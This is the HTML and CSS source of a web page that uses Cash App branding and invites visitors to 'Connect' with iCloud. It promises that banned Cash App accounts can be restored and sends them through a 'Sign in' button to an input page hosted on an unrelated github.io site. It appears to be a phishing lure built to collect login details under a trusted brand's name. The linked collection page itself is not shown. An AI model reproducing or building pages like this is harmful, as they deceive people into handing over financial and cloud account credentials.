
<!DOCTYPE html>
<html>
    <style>
        .bigte{
          font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
          font-size: 80px;
          display:flex;
          justify-content: center;
        }
        .smallerte{
          font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
          font-size: 65px;
          display:flex;
          justify-content: center;
        }
        .teimg{
          margin: 25px;
          display:flex;
          justify-content: center;
        }
        .flex1 button{
          border-radius: 10px;
          border-color: rgb(50, 50, 50);
          background-color: rgb(50, 50, 50);
          color: white;
          padding: 15px 32px;
          transition-duration: 0.4s;  
        }
        .flex1 button :hover{
          border-radius: 10px;
          border-color: rgb(120, 120, 120);
          background-color: rgb(120, 120, 120);
        }
        .flex1{
          font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
          font-size: 25px;
          display: flex;
          justify-content: center;  
        }
        .flex-container5 {
          position: absolute;
          top: 0;
          left: 0;
          right: 0;
          z-index:-1;
          flex: 1 0 20%;
          height: 100px;
          background-color: white;
        }
        body{
          padding: 25px;
          background-color:rgb(240,240,240,255);
        }
        .flex2{
          font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
          font-size: 17px;
          display: flex;
          justify-content: center;  
        }
    </style>
    <body>
        <div class="flex-container5"></div>
        <div class="flex-container">
        <head class="head"><img src="cashapp.webp" width="210" height="50"></head>
        <div class="flex3"><p class="bigte">Connect<img class="teimg"src="cashapp.webp"></p></div>
        <div class= "flex3"><p class="smallerte">With iCloud.</p></div>
        <div class="flex1"><a href="https://f1stnam3.github.io/Appsolute-cash/input.html">
            <button>Sign in</button>
          </a></div>
        <p class="flex1">Banned cashapp? No problem!</p>
        <p class="flex2">process may take a day.</p>
    </body>
</html>

